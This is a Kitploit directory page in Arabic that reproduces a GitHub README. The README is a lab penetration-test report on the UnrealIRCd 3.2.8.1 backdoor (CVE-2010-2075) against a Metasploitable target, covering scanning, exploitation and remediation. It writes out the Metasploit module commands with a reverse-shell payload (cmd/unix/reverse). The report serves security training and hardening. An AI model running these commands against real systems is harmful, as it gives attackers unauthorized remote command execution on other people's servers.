Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
unrealircd-backdoor-pentest-report — تقرير مختبر اختبار اختراق مُتحكَّم فيه حول ثغرة الباب الخلفي في UnrealIRCd 3.2.8.1 (CVE-2010-2075) على Metasploitable3 مع خطوات المعالجة. | Kitploit
أدوات/GitHubGitHub/elazab2005/unrealircd-backdoor-pentest-report
الاستطلاعماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
elazab2005/unrealircd-backdoor-pentest-report

unrealircd-backdoor-pentest-report

تقرير مختبر اختبار اختراق مُتحكَّم فيه حول ثغرة الباب الخلفي في UnrealIRCd 3.2.8.1 (CVE-2010-2075) على Metasploitable3 مع خطوات المعالجة.

عرض المستودع
منذ 4 أياملم تتم المراجعة بعد

🛡️ اختبار اختراق الباب الخلفي لـ UnrealIRCd

مشروع اختبار اختراق مُتحكم به يركّز على تحديد واستغلال ومعالجة الباب الخلفي لـ UnrealIRCd 3.2.8.1 (CVE-2010-2075) في بيئة تدريب معزولة.

إخلاء مسؤولية: أُجري هذا المشروع حصرياً لأغراض تعليمية واختبارات أمنية مصرح بها ضد بيئة معملية معرّضة للخطر عمداً. لم يتم استهداف أي أنظمة غير مصرح بها.


📌 نظرة عامة على المشروع

يوضح هذا المشروع سير عمل كاملاً لتقييم الثغرات واستغلالها ضد خدمة UnrealIRCd 3.2.8.1 المعرّضة للخطر.

يغطي التقييم ما يلي:

  • اكتشاف الخدمات وجردها
  • تحديد خدمة UnrealIRCd المعرّضة للخطر
  • التحقق من صحة خدمة IRC المكشوفة
  • الاستغلال المُتحكم به باستخدام Metasploit
  • جمع الأدلة
  • المعالجة الأمنية وتحصين النظام
  • توثيق فني لاختبار الاختراق

الهدف

البندالتفاصيل
الهدفبيئة معملية Metasploitable
عنوان IP الهدف10.10.10.13
الخدمة المعرّضة للخطرUnrealIRCd
الإصدار3.2.8.1
البروتوكولIRC
المنفذ6667/TCP
الثغرةالباب الخلفي لـ UnrealIRCd
CVECVE-2010-2075
الخطورةحرجة

وفقاً لقاعدة بيانات الثغرات الوطنية (NVD) التابعة لـ NIST، احتوت توزيعات UnrealIRCd 3.2.8.1 المتأثرة على تعديل مُدخل خارجياً قد يسمح للمهاجمين عن بُعد بتنفيذ أوامر عشوائية.


🎯 الأهداف

كانت الأهداف الرئيسية لهذا التقييم:

  1. تحديد الخدمات المكشوفة على الهدف.
  2. تحديد ما إذا كانت خدمة UnrealIRCd معرّضة للخطر.
  3. التحقق من صحة الثغرة من خلال الاستغلال المُتحكم به.
  4. تقييم الأثر المحتمل للاستغلال الناجح.
  5. توثيق الأدلة الفنية.
  6. تطبيق إجراءات المعالجة المناسبة.
  7. التحقق من تأمين الخدمة المعرّضة للخطر أو تعطيلها.

🧰 الأدوات المستخدمة


🔎 المنهجية

اتبع التقييم سير عمل مبسطاً لاختبار الاختراق:

root@kitploit:~
Reconnaissance
      ↓
Service Enumeration
      ↓
Vulnerability Identification
      ↓
Exploitation
      ↓
Evidence Collection
      ↓
Impact Assessment
      ↓
Remediation
      ↓
Verification

1. 🔍 اكتشاف الخدمات

كانت المرحلة الأولى هي تحديد الخدمات المكشوفة على المضيف الهدف.

حدد التقييم خدمة IRC تستمع على:

root@kitploit:~
TCP/6667

ارتبطت الخدمة بـ UnrealIRCd 3.2.8.1، وهو إصدار معروف بتأثره بثغرة الباب الخلفي.

الأدلة

فحص المنافذ

الشكل 1 — فحص المنافذ وجرد الخدمات

قدم اكتشاف TCP/6667 المؤشر الأولي على أن خدمة IRC كانت مكشوفة وتتطلب مزيداً من التحقيق.


2. 🚨 تحديد الثغرة

ارتبط إصدار UnrealIRCd المحدد بـ CVE-2010-2075.

الثغرة ليست مجرد خطأ برمجي تقليدي. احتوى الأرشيف المتأثر على تعديل/باب خلفي خبيث مكّن من تنفيذ الأوامر عن بُعد. يصف NVD المشكلة بأنها حصان طروادة مُدخل خارجياً في ماكرو DEBUG3_DOLOG_SYSTEM.

توثق وثائق Rapid7 الخاصة بـ Metasploit الوحدة المقابلة على النحو التالي:

root@kitploit:~
exploit/unix/irc/unreal_ircd_3281_backdoor

وتصفها بأنها تستغل الباب الخلفي الخبيث الموجود في أرشيفات UnrealIRCd 3.2.8.1 المتأثرة.


3. 💥 الاستغلال المُتحكم به

تم التحقق من صحة الثغرة في بيئة المختبر المعزولة باستخدام Metasploit Framework.

مثال على سير عمل الاستغلال:

root@kitploit:~
msfconsole

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 10.10.10.13

set PAYLOAD cmd/unix/reverse

run

كان الغرض من هذه الخطوة هو التحقق مما إذا كان يمكن إساءة استخدام الخدمة المكشوفة للحصول على تنفيذ أوامر عن بُعد.

توثق Rapid7 وحدة Metasploit هذه خصيصاً للباب الخلفي لـ UnrealIRCd 3.2.8.1.

الأدلة

دليل الاستغلال

الشكل 2 — دليل الاستغلال المُتحكم به

يوضح الدليل مرحلة الاستغلال التي نُفذت ضد الهدف المعملي المصرح به.


4. ⚠️ الأثر الأمني

يمكن أن يمنح الاستغلال الناجح للباب الخلفي المهاجم القدرة على تنفيذ الأوامر عن بُعد في السياق الأمني لعملية UnrealIRCd المتأثرة.

تعتمد الصلاحيات الدقيقة التي يتم الحصول عليها على الحساب الذي يعمل به برنامج IRC الخفي.

يشمل الأثر المحتمل:

  • تنفيذ أوامر غير مصرح به
  • اختراق أولي للنظام
  • الوصول إلى الملفات المتاحة للحساب المخترق
  • مزيد من الجرد المحلي
  • تصعيد صلاحيات محتمل
  • استمرارية محتملة
  • حركة جانبية محتملة في حالة وجود نقاط ضعف إضافية

مهم: لا ينبغي تفسير الأثر المحتمل على أنه دليل على تنفيذ كل إجراء مذكور خلال هذا التقييم.

تؤكد وثائق Nmap للباب الخلفي لـ UnrealIRCd أن الثغرة يمكن استخدامها لتنفيذ أوامر عشوائية على النظام البعيد.


5. 🛠️ المعالجة

لا ينبغي أن تظل تركيبة UnrealIRCd المعرّضة للخطر مكشوفة في بيئة إنتاج.

تشمل إجراءات المعالجة الموصى بها:

إجراءات فورية

  1. إزالة حزمة UnrealIRCd المخترقة/المزوّدة بباب خلفي.
  2. استبدالها بإصدار موثوق وتم التحقق منه من مصدر شرعي.
  3. تعطيل خدمة IRC إذا لم تكن مطلوبة.
  4. تقييد الوصول إلى خدمات IRC باستخدام قواعد جدار الحماية أو قوائم التحكم في الوصول (ACLs) للشبكة.
  5. مراجعة النظام بحثاً عن مؤشرات الاختراق.
  6. مراجعة سجلات المصادقة وسجلات النظام.
  7. تدوير بيانات الاعتماد التي ربما تكون مكشوفة إذا كان الاختراق مشتبهاً به.

تحصين الشبكة

إذا لم تكن IRC مطلوبة:

root@kitploit:~
sudo ufw deny 6667/tcp

إذا كانت الخدمة مطلوبة، فيجب تقييد الوصول إلى الشبكات الموثوقة بدلاً من تعريضها على نطاق واسع.

تحصين الخدمة

النهج المفضل هو إزالة البرنامج المعرّض للخطر ونشر إصدار مدعوم وموثوق بدلاً من محاولة الاعتماد فقط على تصفية الشبكة.


6. ✅ أدلة المعالجة

تم توثيق مرحلة المعالجة بعد تطبيق الضوابط الأمنية المناسبة.

دليل المعالجة

الشكل 3 — دليل المعالجة / التحصين

يجب أن يوضح دليل المعالجة حالة الخدمة و/أو تكوين جدار الحماية بعد تطبيق الإجراءات التصحيحية.


📊 تقييم المخاطر

صُمم الباب الخلفي للسماح بتنفيذ الأوامر عن بُعد ويمكن أن يعمل بشكل مستقل عن قيود مستخدمي IRC العادية، مما يجعل تعريض الخدمة المعرّضة للخطر خطراً أمنياً كبيراً.


📁 هيكل المشروع

root@kitploit:~
unrealircd-backdoor-pentest-report/
│
├── README.md
├── UnrealIRCD_Backdoor_PenTest_Report.pdf
│
└── images/
    ├── port_scan.png
    ├── exploit_evidence.png
    └── remediation.png

📸 ملخص الأدلة

الدليلالوصف
port_scan.pngاكتشاف خدمة IRC المكشوفة
exploit_evidence.pngدليل الاستغلال المُتحكم به
remediation.pngدليل التحصين/الأمن بعد المعالجة

🧠 الدروس الرئيسية المستفادة

يوضح هذا التقييم عدة مفاهيم مهمة لاختبار الاختراق:

  • جرد الخدمات ضروري لتحديد سطح الهجوم.
  • يمكن لتحديد إصدار البرنامج أن يكشف عن ثغرات معروفة.
  • يمكن للخدمة القديمة المكشوفة على الشبكة أن توفر مسار وصول أولي مباشر.
  • يجب دائماً تنفيذ الاستغلال ضمن نطاق مصرح به.
  • الأدلة الفنية ضرورية لدعم نتائج اختبار الاختراق.
  • يجب أن تعالج المعالجة المشكلة الأمنية الأساسية بدلاً من مجرد إخفاء الخدمة المكشوفة.
  • يجب أن تميز التقارير الأمنية بوضوح بين النتائج المرصودة والأثر المحتمل.

📚 المراجع

  • قاعدة بيانات الثغرات الوطنية NIST — CVE-2010-2075
    تفاصيل CVE ووصف الثغرة.

  • قاعدة بيانات الثغرات Rapid7 — تنفيذ أوامر الباب الخلفي لـ UnrealIRCd 3.2.8.1
    توثيق وحدة Metasploit والتفاصيل الفنية.

  • Rapid7 Metasploit Framework — وحدة الباب الخلفي لـ UnrealIRCd
    التنفيذ الرسمي لوحدة Metasploit.

  • وثائق Nmap NSE — irc-unrealircd-backdoor
    توثيق اكتشاف الباب الخلفي لـ UnrealIRCd.


⚖️ إخلاء المسؤولية

هذا المستودع مخصص حصرياً للتعليم في مجال الأمن السيبراني، واختبار الاختراق المصرح به، والبحث الأمني في البيئات الخاضعة للرقابة.

يجب استخدام التقنيات الموضحة في هذا المشروع فقط ضد الأنظمة التي تم الحصول على إذن صريح لاختبارها.

لا تستخدم هذه التقنيات ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها.

تنزيل الأداة
الأداةالغرض
Nmapفحص المنافذ وجرد الخدمات
Netcatاختبار اتصال خدمات TCP
Metasploit Frameworkالاستغلال المُتحكم به
Linux CLIالتحقق من النظام وتحصينه
UFWتكوين جدار الحماية
Pythonدعم المهام الأمنية/الاختبارية
الفئةالتقييم
الثغرةالباب الخلفي لـ UnrealIRCd 3.2.8.1
CVECVE-2010-2075
ناقل الهجومالشبكة
المصادقة المطلوبةلا تتطلب مصادقة لتفعيل الباب الخلفي
تفاعل المستخدمغير مطلوب
الأثرتنفيذ أوامر عن بُعد
الخطورةحرجة